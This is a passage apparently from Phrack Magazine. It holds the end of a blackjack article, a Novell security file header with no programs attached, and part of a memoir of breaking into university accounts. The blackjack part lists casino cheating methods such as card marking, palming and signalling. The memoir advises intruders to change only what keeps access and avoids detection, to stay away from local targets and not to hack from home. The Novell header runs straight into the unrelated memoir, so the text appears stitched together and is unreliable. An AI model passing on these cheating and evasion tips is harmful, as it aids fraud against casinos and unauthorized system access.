What I mean by Social Engineering the casino is to list ways that trick the casino into thinking you are just a dumb tourist who is throwing money away. Look around, smile, act unconcerned about your bet, don't be afraid to talk to the dealer, floorperson, or pit boss. Don't play 8 hours straight. Perhaps order a drink.
Things of this nature will help deflect suspicion.

I only recall attracting attention once. The casino wasn't very busy, there were 3 people at the table including myself. I only had about an hour to play so I bet aggressively. I started with $5 and $10 but made some $50.00 bets whenever I got a feeling that I was going to win the next hand (quite the scientific strategy I know). A woman next to me who seemed to be a fairly seasoned player made a comment that I was a little too aggressive. The pit boss hovered about the table. My hour was nearly up, I bet $10.00 for the dealer and $50.00 for myself. I lost the hand leaving me only $100.00 ahead, and left. The only thing I could think of besides the betting spread which really wasn't a big deal was that the casino was FREEZING inside. I was shivering like hell, it probably looked like I was shaking out of fear of being spotted as a counter or worse...a cheater.

So what if a casino thinks you are a counter? To be honest, there have probably been less than 1000 people who have been permanently barred from play (ie, they have their mugs in the black book). A far greater number have been asked to leave but were not prevented from returning in the future.

Tipping the dealer may not necessarily get the casino off your back but certainly doesn't hurt. When you toke the dealer, place the chip in the corner of your betting box a few inches from your bet. You may want to say "we are in this one together" or some such to make sure they are aware of the tip. This approach is better than just giving them the chip because their 'fate' is tied in with yours. If your hand wins, 99 out of 100 times they will take the tip and the tip's winnings off the table.

The 1 out of 100 that the dealer let the tip+win ride happened to me over and over again for the better part of a day. It was a week before I had to go back to college and I was broke, with no money to pay the deposits for rent and utilities.
Basically, if I didn't come up with some money in 7 days, I was not going back to school. This was 4 years ago BTW. I took out $150 on my credit card (stupid but hey, I was desperate) and started playing and winning immediately. I pressed my bets time and time again and in an hour or two had $500 in front of me (+$350). I started losing a bit so I took a break for a short while. I went back to a different table with a different dealer. As soon as I sat down I started winning. I started to tip red chips ($5.00) for the dealer. The first couple of times he took the $10.00 right away. I kept winning steadily and continued to toke him. Then he started to let the $10.00 ride! I was amazed because I had never seen that before. That is when I knew I was HOT. If the dealer is betting on you to win, that says something. When I stopped playing I cashed in eight black chips. I left with eight one hundred dollar bills, a net profit of $650.00, just enough to cover everything. Whew!

I probably tipped close to $100.00 that day, and the dealer must have made double to triple that due to him betting with me. There were a number of times when the pit boss wasn't close that the dealer would IGNORE my hit or stand signal. The first time he did this I repeated myself and he did what I asked but gave me a 'look'. Needless to say, I lost the hand. After that, if he 'thought' I said stand, I didn't argue. This occurred when he had a ten as the up-card so he knew his total from peeking at the hole card. I am not sure if this is considered cheating because I did not ask him to do this, nor did we conspire. It just happened a few times, usually when I had $25-$50 bets on the line which is when I made sure to throw in a red chip for him.

Casino Cheating and Player Cheating:
------------------------------------

Cheating by the house is rare in the major casinos ie, those located in Nevada and Atlantic City.
The Nevada Gaming Commission may revoke a casino's gambling license if a casino is caught cheating players. Granted, there may be a few employees (dealers, boxmen, whomever) that may cheat players, but it is extremely doubtful any casino in Nevada or Atlantic City does so on a casino-wide scale. You definitely should be wary of any casino that is not regulated such as those found on many cruise ships. Just because a casino does not have to answer to any regulatory agency does not mean it is cheating players. The fact is that casinos make plenty of money legitimately with the built-in house advantages and don't really need to cheat players to survive. I provide some cheating methods here merely to make you aware of the scams. These techniques are still carried out in crooked underground casinos and private games.

The single deck hand-held BlackJack game is quite a bit more susceptible to cheating by both the dealer and the player than games dealt from a shoe. The preferred method of dealer cheating is called the "second deal". As you may infer, this technique requires the card mechanic to pretend to deal the top card but instead deals the card that is immediately under the top card. Imagine if you could draw a low card when you need a low card, and a high card when you need a high card. You could win large sums of money in a very short period. Well, a dealer who has the ability to execute the demanding sleight of hand movements for second dealing can drain even the best BlackJack player's bankroll in short order.

If someone is going to deal seconds, they must know what the second card is if he or she is to benefit. One way to determine the second card is by peeking. A mechanic will distract you by pointing or gesticulating with the hand that is holding the deck. "Look! There's Gail Thackeray!". While you are busy looking, the dealer is covertly peeking at the second card. A more risky method is pegging.
A device called a pegger is used to put small indentations in the cards that the dealer can feel. Pegging all the ten value cards has obvious benefits. Another method is the "high-low pickup". I like this one because it's easy for a novice to do especially in a place where there are a lot of distractions for the players. After every hand, the dealer picks up the cards in a high-low alternating order. The mechanic then proceeds with the "false shuffle" in which the deck is thought to have been shuffled but in reality the cards remain in the same order as before the shuffle. As you well know by now, a high-low-high-low arrangement of the cards would be death to the BlackJack player. Get dealt a ten and then a 5, you have to hit, so get another ten. Busted. Since the dealer doesn't lose until he/she busts, all the players who bust before lose. Bottom dealing and switching hole cards are other techniques that may be used to cheat players. For shoe games, there is a device called a "holdout shoe" that essentially second deals for the dealer. Discreet mirrors and prisms may be contained in the holdout shoe which only allow the dealer to see what card is next. Shorting a regular shoe of ten cards will obviously have a detrimental effect on the BlackJack player. Player cheating isn't recommended. However, I'll quickly list some of the methods for awareness purposes. The old stand-by of going up to a table, grabbing some chips, and running like hell is still done but certainly lacks originality. Marking cards while you play is another popular method. "The Daub" technique is done by clandestinely applying a substance that leaves an almost invisible smudge on the card. High value cards like tens are usually the targets. One scam mentioned in one of the references was the use of a special paint that was only visible to specially made contact lenses. The "hold out" method requires the palming of a card and substituting a better one. 
This is usually done when there is big money bet on the hand. One of the risks to these methods is when the deck is changed since the pit boss always scrutinizes the decks after they are taken out of play.

Other methods entail playing two hands and switching cards from one hand to the other, counterfeiting cards and/or casino chips, adding chips after a winning hand (I have seen this done twice, couldn't believe my eyes but certainly wasn't going to RAT the thieves out).

Some dealers may be careless when looking at their hole card for a BlackJack. A person behind the dealer on the other side of the pit may be able to discern the card. The value is then signalled to a player at the table. Astute pit bosses may notice someone who is not playing that scratches their head too much though. Wireless signalling devices have been used for various purposes but some casinos have new electronic detection systems that monitor certain frequencies for activity.

Some Comments Regarding Computer BlackJack Software for PC's:
---------------------------------------------------------------

I strongly recommend that you practice using a BlackJack program of some kind before going out to play with real cash. The first program I used for 'training' some years ago was "Ken Uston's BlackJack" on my old Apple ][+. Later I acquired "Beat The House" for the same machine. I recently bought a program for my IBM and have been using it to refresh my memory regarding basic strategy, card counting, and money management techniques. I assume you will recognize the guy's name in the title now that you have read most of this article. I bought: "Dr. Thorp's Mini BlackJack" by Villa Crespo Software at a Wal-Mart of all places for a measly $7.88. This is an abridged version however. Villa Crespo charges $12.95 for it if you order via mail. They also offer an unabridged version for $29.95 via mail.
Villa Crespo (don't ask me where they got that name) offers other programs for Craps, Video Poker, and 7-Card Stud in case you are interested in those games of chance. By the way, on the order form I also noticed "FAILSAFE Computer Guardian (Complete protection and security for your system)" for $59.95. For some reason any time a piece of paper has the word 'security' on it, my eyes zero in on it....

Some features that I liked about this scaled down version of their BlackJack program were the TUTOR, which advises you on whether to hit, stand, take insurance (no way), etc. as per Basic Strategy. The Tutor for the abridged version does NOT take into consideration the card count when making recommendations though. If you are counting the cards, the program keeps count also, so if you lose count you can check it by pressing a function key. The STATS option is neat since it keeps track of things such as how many hands were dealt, how many you won/lost, etc. and can be printed out so you can track your progress. The program allows you to save your current session in case you get the urge to dial up the Internet to check your email, something that should be done every hour on the hour....

One thing I did not like about the program was that it allowed you to bet over your bankroll. I accidentally pushed [F2] (standardized at $500.00 a bet) instead of [F1] (standardized at $5.00 a bet) ---- a slight difference in wager I'd say. Having only $272.00 in my bankroll didn't stop the program from executing the command and in my opinion it should have prevented the overdraft.

The first time I played Dr. Thorp's Mini BlackJack, it took me about 95 hands to double my money. I started with $200.00, bet from $5.00 to $25.00, never dropped below $180.00 which surprised me, and received 3 BlackJacks. I won 63 hands, and lost 32. I played head on against the dealer, although the program allows for up to 6 players.
I consider that lucky since I had my fair share of going broke in later sessions.

My advice when using a BlackJack computer program is: do not start with a bizzillion dollars or anything like that. Start with the amount that you truly plan to use when you sit down at an actual table. If you play in a crowded casino, all the low minimum bet tables (ie: $1.00 to $5.00) will most likely be filled to capacity and only $10.00 or $15.00 tables will have openings. Keep this in mind because when you make bets with the computer program, you should wager no less than whatever the minimum will be at the table you sit down at. If your bankroll is only $200.00 playing at anything more than a $5.00 minimum table is pushing it.

Another thing to note is that playing at home is kind of like watching Jeopardy on TV while you are sitting on the couch. People who have been on the show always say it was much harder than when they blurted out answers during dinner with their mouths full (the Heimlich maneuver--a real lifesaver!). The same thing goes for BlackJack. When you are sitting at an actual table, your adrenaline is flowing, your heart starts to pump faster, you make irrational plays especially when you start losing, and odds are you will forget things that were memorized perfectly. There is no substitute for the real thing and real experience.

Quick Comments on Other Casino Games:
-------------------------------------

A few people suggested I briefly mention some of the other casino games so I added this section. I don't go into much detail at all as this file is too unwieldy already. Besides, if you want to know more, I am sure you'll pick up the appropriate reference. Hundreds of books have been published on gambling and they are available by contacting [2]. My aim here was to mention details that most people may not be aware of.

BACCARAT: This is the game you see in movies a lot. See [12]'s FAQ for a good explanation of this game.
CRAPS: Craps is probably the most complicated casino game as far as the different ways to bet things are concerned but it's really not that hard to learn. I just want to throw one table at you adapted from Reference [13]. The table won't make much sense unless you are already familiar with craps. In case you have forgotten or didn't know, craps is 'that dice game'. The purpose of presenting it is to save you $$$$$ <-- Still love that dollar sign key! hehe

                  Lamest Bets at the Craps Table

        BET               PAYS       SHOULD PAY   YOUR ADVANTAGE
        -------------------------------------------------------
        Any-7             4 to 1     5 to 1       -16.7 %
        2 (or 12)         30 to 1    35 to 1      -13.9 %
        Hard 10 (or 4)    7 to 1     8 to 1       -11.1 %
        3 (or 11)         15 to 1    17 to 1      -11.1 %
        Any Craps         37 to 1    8 to 1       -11.1 %
        Hard 6 (or 8)     9 to 1     10 to 1      -9.1 %

SLOTS: Playing slots is a gamble. Obviously you say. No, I mean it's a gamble to play them. House advantages are almost never displayed on a particular slot machine. Different machines and different locations may have different casino win percentages. When you go up to a slot machine, you have no idea if its advantage over you is 5% or 25%. Unless you have been watching it, you don't know if it just paid off a big jackpot either. I don't play slots as a matter of principle. If you do play I think there are still some $.05 slots in Vegas. Play the nickel slots and keep your shirt, especially if it's an LOD T-shirt.

VIDEO POKER: Reference [13] gives the following advice regarding video poker: "...don't expect to win. Manage your money so that you limit your losses." I think it's a bit negative but I can't argue with the logic. Also, as with slots, you may want to play at a machine that is networked with others which has a progressive payoff. This way at least you have a chance of making the big bucks in addition to those periodic small payoffs.
VIDEO BLACKJACK: If you like to avoid people and like BlackJack, you may be thinking that this is a great way for you to "hack two systems with one password" and make a little money on the side. Before you start putting quarter or dollar tokens into video BlackJack machines there are a couple of things to know. First, you can't use card counting techniques because every hand is essentially dealt from a new deck. When the computer deals a hand it is just providing 'random' cards. Perhaps if you saw the source code, you may be able to determine some sort of bias but I suspect it would be minuscule at best. The rules vary from machine to machine and the maximum allowable bet varies also. As with the video poker and video slot machines, the owner of the machine may set the options to their taste (amount of profit).

Selected Bibliography:
----------------------

The following are some references you may want to check out and some of my sources of information for this article. They are not in any particular order and the format is far from standard as opposed to my thesis bibliography :)

[1] "BlackJack Forum Newsletter" by RGE Publishing in Oakland, California. This is a quarterly publication which has the location and rule variations info (among other things) for casinos in the state of Nevada.

[2] The Gamblers Book Club (it's really a store) can sell you a sample of the BlackJack Forum Newsletter for $10.00. They have all kinds of new and out of print books, used magazines, etc. They are located in Vegas (630 S. 11th St.) so stop by in person or call 1-800-634-6243 which was valid as of 6/1/93 since I just gave them a ring...the guy I spoke to was very nice and helpful so I thought I'd give them a plug here.

[3] "Beat The Dealer" by Dr. Edward O. Thorp. Make sure you get the SECOND edition (1966) since it has Dr. Julian Braun's additions to the original 1962 edition.
[4] "Gambling Times Magazine" (now defunct), 'BlackJack Bias Part 1 and 2' July and August 1987 Issues by Mason Malmuth. This magazine was great because it kept you up to date on the latest in gambling systems and what casinos are up to. The article is about the author using his PC to perform simulations regarding the effects of non-random card distribution on BlackJack.

[5] "Break The Dealer" by Jerry L. Patterson and Eddie Olsen, 1986 Perigee Books. Worth the money for the chapters on Shuffle Tracking alone.

[6] "The Optimum Strategy in BlackJack" by Roger R. Baldwin, Wilbert E. Cantey, Herbert Maisel, James P. McDermott. Journal of the American Statistical Association, September 1956. Eight of ten pages are mathematics.

[7] "The World's Greatest BlackJack Book" revised edition (1987) by Dr. Lance Humble and Dr. Carl Cooper, Doubleday. I am not sure it is THE world's greatest, but it is an excellent book. It is 400 pages and provides more details than you probably care to know about the Hi-Opt I counting system.

[8] "Turning the Tables on Las Vegas" by Ian Anderson, 1978. This is an excellent book if you were interested in The Social Engineering the Casino section. The author shares a lot of interesting and funny stories that can keep you from getting barred. Note that 'Ian Anderson' is the author's handle.

[9] "Las Vegas, Behind the Tables" by Barney Vinson, 1986, Gollehon Press. Written by a casino executive, I found it to be quite illuminating.

[10] "Gambling Scams" by Darwin Ortiz, 1990, Carrol Publishing. If you play in any private games, be sure to read this one to avoid getting screwed. It even has a section on crooked carnival games.

[11] "Winning Without Counting" by Stanford Wong. This book has an interesting section on 'Dealer Tells' and how to exploit them.

[12] "Rec.Gambling" Internet USENET Newsgroup. The rec.gambling newsgroup is an excellent free source of current information on BlackJack and other games.
People who have just gotten back from various casinos post about their playing results and the treatment from casinos. One person just posted that he was barred from playing BlackJack (a casino employee told him he could play any game in the casino EXCEPT BlackJack) after he was ahead only $40.00. The reason apparently was due to his fairly mechanical play and betting. The rec.gambling FAQ was message #15912 when I read the newsgroup on 6/8/93. They plan on posting the FAQ every month or so. I found the FAQ to be very informative. There is an alt.gambling newsgroup but it is dead with 0 messages.

[13] "The Winner's Guide to Casino Gambling", revised edition by Edwin Silberstang, 1989 Plume printing. This book covers a wide range of casino games and has a large list of gambling terms in the back.

[14] "Gambling and Society" edited by William R. Eadington, 1976. This book provides plenty of information on the psychology of gambling. I found the section on 'Who Wants to be a Professional Gambler?' interesting as the study indicates the types of vocations that show high correlations with being a professional gambler. One of those vocations with an 'extremely high correlation' was being a Secret Service agent. Maybe Agent Foley will change jobs.....he can't do much worse, ahem. Chapter 24 by James N. Hanson is entitled "Nonlinear Programming Simulation and Gambling Theory Applied to BlackJack" which some of you programmers might be interested in.

[15] "The BlackJack Shuffle-Tracking Treatise" by Michael R. Hall accessible via the Internet by anonymous FTP: soda.berkeley.edu in the pub/rec.gambling/blackjack directory. This is a very detailed 78K file that was well done. It provides plenty of the nitty-gritty details that I did not have the space to mention in this article. I highly recommend it.

[16] "Risk of Ruin" by Michael R. Hall available from same source as [15] above.
This paper provides some mathematical formulas for helping you determine the likelihood of losing portions of your starting bankroll. Although the equations look complicated, anyone with a $10 scientific calculator can use them. The author provides source code for a program written in C that calculates the risk formula. Also get his "Optimal Wagering" file which helps you determine your bet size.

[17] The movie: "Fever Pitch" starring Ryan O'Neal. This is the most realistic movie I have seen regarding the psychology of a gambler. If I recall correctly, it was made in 1985 and is in most video rental stores.

Final Comments:
---------------

Let me quickly thank those who took the hour to read my article, recommended corrections and offered their insightful comments: The Marauder, Mark Tabas, Professor Falken, Al Capone, Jester Sluggo, and Bruce Sterling. Also, I would like to thank JLE, my 'gambling mentor' mentioned earlier even though he doesn't know me as 'lex' and probably will never see this file.

If anyone has comments, corrections, etc. feel free to email me. Kindly note that I have no interest in receiving flames from any self-professed BlackJack experts out there as I do not claim to be an expert and due to size restrictions, I couldn't get all that complicated regarding counting techniques and such. Besides, anyone who wants to get serious will take the time to thoroughly read the references listed in the previous section. My main purpose was to familiarize you with the game of BlackJack and provide a resource which can point you in the right direction for more in-depth information. Thank you for your time and I hope you learned something from this article even if you don't put any of the information to use.
If you have something really SEKRET to tell me, here is my PGP Public Key:

End of "How To Hack BlackJack": File 2 of 2

==Phrack Magazine==

Volume Four, Issue Forty-Three, File 11 of 27

Help for Verifying Novell Security
Provided By Phrack Magazine

In nearly a year since their release, the programs Hack.exe and View.exe are still potential threats to the security of Novell Networks. Despite Novell's commendable response with a patch for the holes these programs exposed, many system administrators have not yet implemented the fix. We at Phrack encourage system administrators to uudecode and execute the following programs to determine whether or not their servers are at risk. The patches, SECUREFX.NLM for Netware 3.11, and SECUREFX.VAP for Netware 2.2 are available via Novell's NetWire, or from ftp.novell.com. Users with additional questions about Netware security can call Novell directly at 800-638-9273.

From the beginning of this semester, I neglected my classes, and instead read RFCs and Unix system
security manuals. I began experimenting with the communications capabilities of the TCP/IP protocol suite, and began to understand more deeply how it was that such a network could exist as an organic whole greater than the sum of its parts. In the interest of experimenting with these interconnections, I began to acquire a number of Internet 'guest' accounts. When possible, I would use these to expand my area of access, with the goal of testing the speed and reliability of the network; and, I freely admit, for my amusement. I realized, at the time, that what I was doing was, legally, in a gray area; but I did not give moral considerations more than a passing thought. Later, I had leisure to ponder the moral and legal aspects of my actions at great length, but at the time I was collecting accounts I only considered the technical aspects of what I was doing. I discovered Richard Stallman's accounts on a variety of computers. I used these only for testing mail and packet routing. I realized that it would be trivial to use them for malicious purposes, but the thought of doing so did not occur to me. The very idea of hacking a computer system implies the desire to outsmart the security some unknown person had designed to prevent intrusion; to abuse a trust in this manner has all the appeal to a hacker that a hunter would find in stalking a kitten with a howitzer. To hack an open system requires no intelligence and little knowledge, and imparts no deeper knowledge than is available by legitimate use of the system. I soon had a collection of accounts widely scattered around the continent: at the University of Chicago, at the Pennsylvania State University, at Johns Hopkins, at Lawrence-Berkeley Laboratories and a number of commercial and government sites. However, the deadly mistake of hacking close to home was my downfall. 
I thought I was untouchable and infallible, and in a regrettable accident I destroyed the /etc/groups file at the Software Engineering Laboratory at Penn State, due to a serious lapse in judgment combined with a series of typographical errors. This is the only action for which I should have been held accountable; however, as you shall see, it is the only action for which I was not penalized in any way. I halt the narrative here to deliver some advice suggested by my mistakes. My first piece of advice is: avoid the destruction of information by not altering any information beyond that necessary to maintain access and avoid detection. Try to protect yourself from typographical errors by backing up information. My lack of consideration in this important regard cost Professor Dhamir Mannai many hours reconstructing the groups file. Dhamir plays a major role in the ensuing fracas, and turned out very sympathetic. I must emphasize that the computer security people with whom we have such fun are often decent people. Treat a system you have invaded as you would wish someone to treat your system if they had done the same to you. Protect both the system and yourself. Damage to the system will have a significant effect on any criminal case which is filed against you. Even the harshest of judges is likely to respond to a criminal case with a bewildered dismissal if no damage is alleged. However, if there is any damage to a system, the police will most certainly allege that you maliciously damaged the machine. It is their job to do so. My second piece of advice is: avoid hacking systems geographically local to you, even by piggybacking multiple connections across the country and back to mask your actions. In any area there is a limited number of people both capable of and motivated to hack. When the local security gurus hear that a hacker is on the loose, they will immediately check their mental list of people who fit the profile. 
They are in an excellent position to monitor their own network. Expect them to do so. I now return to my narrative. Almost simultaneous with my activities, the Computer Emergency Response Team was formed in the wake of the Morris Worm, and was met with an almost palpable lack of computer crime worth prosecuting. They began issuing grimly-worded advisories about the ghastly horrors lurking about the Internet, and warned of such dangerous events as the WANK (Worms Against Nuclear Killers) worm, which displayed an anti-nuclear message when a user logged on to an infected machine. To read the newspaper article concerning Dale and me, a person who collects guest accounts is, if not Public Enemy Number One, at least a major felon who can only be thwarted by the combined efforts of a major university's police division, two computer science departments, and Air Force Intelligence, which directly funds CERT. Matt Crawford, at the University of Chicago, notified CERT of my intrusions into their computer systems. The slow machinery of justice began to creak laboriously into motion. As I had taken very few precautions, they found me within two weeks. As it happens, both the Penn State and University of Chicago systems managers had publicly boasted about the impenetrability of their systems, and perhaps this contributed to their rancor at discovering that the nefarious computer criminal they had apprehended was a Comparative Literature major who had failed his only computer science course.

IV. In the Belly of the Beast

When we arrived at the police station, the police left me in a room alone for approximately half an hour. My first response was to check the door of the room. It was unlocked. I checked the barred window, which was locked, but could be an escape if necessary. Then, with nothing to do, I considered my options. I considered getting up and leaving, and saying that I had nothing to discuss with them.
This was a sensible option at the outset, I thought, but certainly not sensible now. This was a repetition of a mistake; I could have stopped talking to them at any time. Finally, I assumed the lotus position on the table in order to collect my thoughts. When I had almost collected my thoughts, Anne Rego and Sam Ricciotti returned to the room, accompanied by two men I took to be criminals at first glance: a scruffy, corpulent, bearded man I mentally tagged as a public indecency charge; and a young man with the pale and flaccid ill-health of a veal calf, perhaps a shoplifter. However, the pair was Professor Robert Owens of the computer science department and Daniel Ehrlich, Owens' student flunky. Professor Owens sent Ehrlich out of the room on some trivial errand. Ricciotti began the grilling. First, he requested that I sign a document waiving my Miranda rights. He explained that it was as much for my benefit as for theirs. I laughed out loud. However, I thought that as I had done nothing wrong, I should have no fear of talking to them, and I signed the fatal document. I assumed that what I was going to say would be taken at face value, and that my innocence was invulnerable armor. Certainly I had made a mistake, but this could be explained, could it not? Despite my avowed radical politics, my fear of authority was surpassed by a trust for apparent sincerity. As they say, a con's the easiest mark there is. I readily admitted to collecting guest accounts, as I found nothing culpable in using a guest account, my reasoning being that if a public building had not only been unlocked, but also a door in that building had been clearly marked as for a "Guest," and that door opened readily, then no one would have the gall to arrest someone for trespass, even if other, untouched parts of the building were marked "No Visitors." Using a 'guest' account is no more computer crime than using a restroom in a McDonald's is breaking-and-entering. 
Ricciotti continued grilling me, and I gave him further information. I fell prey to the temptation to explain to him what he clearly did not understand. If you are ever in a similar circumstance, do not do so. The opaque ignorance of a police officer is, like a well-constructed security system, a very tempting challenge to a hacker. However, unlike the security system, the ignorance of a police officer is uncrackable. If you attempt to explain the Internet to a police officer investigating you for a crime, and the notion of leased WATS lines seems a simple place to start, it will be seen as evidence of some vast, bizarre conspiracy. The gleam in the cop's eye is not one of comprehension; it is merely the external evidence that a power fantasy is running in the cop's brain. "I," the cop thinks, "will definitely be Cop of the Year! I'm going to find out more about this Internet thing and bust the people responsible." Perhaps you will be lucky or unlucky enough to be busted by a cop who has some understanding of technical issues. Never having been busted by a computer-literate cop, I have no opinion as to whether this would be preferable. However, having met more cops than I care to remember, I can tell you that the chances are slim that you will meet a cop capable of tying shoelaces in the morning. The chances of meeting a cop capable of understanding the Internet are nearly nonexistent. Apparently, this is changing, but by no means as rapidly as the volatile telecommunications scene. At present, the cop who busts you might have a Mac hooked up to NCIC and be able to use it clumsily; or may be able to cope with the user interface of a BBS, but don't bother trying to explain anything if the cop doesn't understand you. If the cop understands you, you have no need to explain; if not, you are wasting your time. In either case, you are giving the police the rope they need to hang you. You have nothing to gain by talking to the police.
If you are not under arrest, they can do nothing to you if you refuse to speak to them. If you must speak to them, insist on having an attorney present. As edifying as it is to get a first-hand glimpse of the entrenched ignorance of the law-enforcement community, this is one area of knowledge where book-learning is far preferable to hands-on experience. Trust me on this one. If you do hack, do not use your personal computing equipment and do not do it from your home. To do so is to invite them to confiscate every electronic item in your house from your telephone to your microwave. Expert witnesses are willing to testify that anything taken could be used for illegal purposes, and they will be correct. Regardless of what they may say, police have no authority to offer you anything for your cooperation; they have the power to tell the magistrate and judge that you cooperated. This and fifty cents will get you a cup of coffee. Eventually, the session turned into an informal debate with Professor Owens, who showed an uncanny facility for specious argument and proof by rephrasing and repeating. The usual argument ensued, and I will encapsulate rather than include it in its entirety.

"If a bike wasn't locked up, would that mean it was right to steal it or take it for a joyride?"

"That argument would hold if a computer were a bike; and if the bike weren't returned when I was done with it; and if, in fact, the bike hadn't been in the same damn place the whole time you assert it was stolen."

"How do you justify stealing the private information of others?"

"For one thing, I didn't look at anyone's private information. In addition, I find the idea of stealing information so grotesque as to be absurd. By the way, how do you justify working for Penn State, an institution that condoned the illegal sale of the Social Security Numbers of its students?"

"Do you realize what you did is a crime?" interjected Ricciotti.

"No, I do not, and after reading this law you've shown me, I still do not believe that what I did violates this law. Beyond that, what happened to presumed innocent until proven guilty?"

The discussion continued in a predictable vein for about two hours, when we adjourned until the next day. Sam sternly advised me that as this was a criminal investigation in progress, I was not to tell anyone anything about it. So, naturally, I immediately told everyone I knew everything I knew about it. With a rapidly mounting paranoia, I left the grim, cheerless interrogation room and walked into the bustle of an autumn day at Penn State, feeling strangely separate from the crowd around me, as if I had been branded with a scarlet 'H.' I took a circuitous route, often doubling back on myself, to detect tails, and when I was sure I wasn't being followed, I headed straight for a phone booth to call the Electronic Music Lab. The phone on the other end was busy. This could only mean one thing, that Dale was online. His only crime was that he borrowed an account from the legitimate user, and used the Huang account at the Engineering Computer Lab, but I realized after my discussion with the police that they would certainly not see the matter as I did. I realized that the situation had the possibility to erupt into a very ugly legal melee. Even before Operation Sun-Devil, I realized that cops have a fondness for tagging anything a conspiracy if they feel it will garner headlines. I rushed to the Lab.

V. A Desperate Conference

"Get off the computer now! I've been busted!"

"This had better not be a goddamn joke."

He rapidly disconnected from his session and turned off the computer. We began to weigh options. We tried to figure out the worst thing they could do to me. Shortly, we had a list of possibilities. The police could jail me, which seemed unlikely. The police could simply forget about the whole thing, which seemed very unlikely. Anything between those two poles was possible.
Anything could happen, and as I was to find, anything would. We planned believing that it was only I who was in jeopardy. If you are ever busted, you will witness the remarkable migration habits of the fair-weather friend. People who yesterday had nothing better to do than sit around and drink your wine will suddenly have pressing duties elsewhere. If you are lucky, perhaps half a dozen people will consent to speak to you. If you are very lucky, three of them will be willing to be seen with you in public. Very shortly the police would begin going after everyone I knew for no other reason than that they knew me. I was very soon to be given yet another of the blessings accorded to those in whom the authorities develop an interest. I would discover my true friends. I needed them.

VI. The Second Interrogation

I agreed to come in for a second interview. At this interview, I was greeted by two new cops. The first cop, with the face of an unsuccessful pugilist, was Jeffery Jones. I detested him on sight. The second, older cop, with brown hair and a mustache, was Wayne Weaver, and had an affable, but stern demeanor, somewhat reminiscent of a police officer in a fifties family sitcom. As witness to this drama, a battered tape recorder sat between us on the wooden table. In my blithe naivete, I once again waived my Miranda rights, this time on tape. The interview began with a deranged series of accusations by Jeffery Jones, in which were combined impossibilities, implausibilities, inaccuracies and incongruities. He accused me of everything from international espionage to electronic funds transfer. Shortly he exhausted his vocabulary with a particularly difficult two-syllable word and lapsed into silence. Wayne filled the silence with a soft-spoken inquiry, seemingly irrelevant to the preceding harangue. I answered, and we began a more sane dialogue. Jeffery Jones remained mostly silent.
He twiddled his thumbs, studied the intricacies of his watch, and investigated the gum stuck under the table. Occasionally he would respond to a factual statement by rapidly turning, pounding the table with his fists and shouting: "We know you're lying!" Finally, after one of Jeffery's outbursts, I offered to terminate the interview if this silliness were to continue. After a brief consultation with Wayne, we reached an agreement of sorts and Jeff returned to a dumb, stony silence. I was convinced that Wayne and Jeff were pulling the good cop/bad cop routine, having seen the mandatory five thousand hours of cop shows the Nielsen people attribute to the average American. This was, I thought, standard Mutt and Jeff. I was to change my opinion. This was not good cop/bad cop. It was smart cop/dumb cop. And, more frighteningly, it was no act. After some more or less idle banter, and a repetition of my previous story, and a repetition of my refusal to answer certain other questions, the interrogation began to turn ugly. Frustrated by my refusal to answer, he suddenly announced that he knew I was involved in a conspiracy, and made an offer to go easy on me if I would tell him who else was involved in the conspiracy. I refused point-blank, and said that it was despicable of him to request that I do any such thing. He began to apply pressure and I will provide a reconstruction of the conversation. As the police have refused all requests by me to receive transcripts of interviews, evidence and information regarding the case, I am forced to rely on memory.

"These people are criminals. You'd be doing the country a service by giving us their names."

"What people are criminals? I don't know any criminals."

"Don't give me that. We just want their names. We won't do anything except ask them for information."

"Yeah, sure. Like I said, I don't know any criminals.
I'm not a criminal, and I won't turn in anyone for your little witch-hunt, because I don't know any criminals, and I'd be lying if I gave you any names."

"You're not going to protect anyone. We'll get them anyway."

"If you're going to get them, you don't need my help."

"We won't tell anyone that you told them about us."

"Fuck that. I'll know I did it. How does that affect the morality of it, anyway?"

Dropping the moral argument, he went to the emotional argument: "If you help us, we'll help you. When you won't help us, you stand alone. Those people don't care about you, anyway."

"What people? I don't know any people."

"Just people who could help us with our investigation. It doesn't mean that they're criminals."

"I don't know anything about any criminals, I said."

"In fact, one of your friends turned you in. Why should you take this high moral ground when you're a criminal anyway, and they'd do the same thing to you if they were in the situation you're in. You just have us now, and if you won't stand with us, you stand alone."

"I don't have any names. And no one I knew turned me in."

This tactic, transparent as it was, instilled a worm of doubt in my mind. That was its purpose. This is the purpose of any of the blandishments, threats and lies that the police will tell you in order to get names from you. They will attempt to make it appear as if you will not be harming the people you tell them about. Having been told that hackers are just adolescent pranksters who will crack like eggs at the slightest pressure and cough up a speech of tearful remorse and hundreds of names, they will be astonished at your failure to give them names. I will here insert a statement of ethics, rather than the merely practical advice which I have heretofore given. If you crack at the slightest pressure, don't even bother playing cyberpunk.
If your shiny new gadget with a Motorola 68040 chip and gee-whiz lightning Weitek math co-processor is more important to you than the lives of your friends, and you'd turn in your own grandmother rather than have it confiscated, please fuck off. The computer underground does not need you and your lame calling-card and access code rip-offs. Grow up and get a job at IBM doing the same thing a million other people just like you are doing, buy the same car a million other people just like you have, and go to live in the same suburb that a million other people like you call home, and die quietly at an old age in Florida. Don't go down squealing like a pig, deliberately and knowingly taking everyone you know with you. If you run the thought-experiment of imagining yourself in this situation, and wondering what you would do, and this description seems very much like what meets you in the bathroom mirror, please stop hacking now. However, if you feel you must turn someone in to satisfy the cops, I can only give the advice William S. Burroughs gives in _Junky_ to those in a similar situation: give them names they already have, without any accompanying information; give them the names of people who have left the country permanently. Be warned, however, that giving false information to the police is a crime; stick to true, but entirely useless information. Now, for those who do not swallow the moral argument for not finking, I offer a practical argument. If you tell the police about others you know who have committed crimes, you have admitted your association with criminals, bolstering their case against you. You have also added an additional charge against yourself, that of conspiracy. You have fucked over the very friends you will sorely need for support in the near future, because the investigation will drag on for months, leaving your life in a shambles. You will need friends, and if you have sent them all up the river, you will have none. Worse, you will deserve it. 
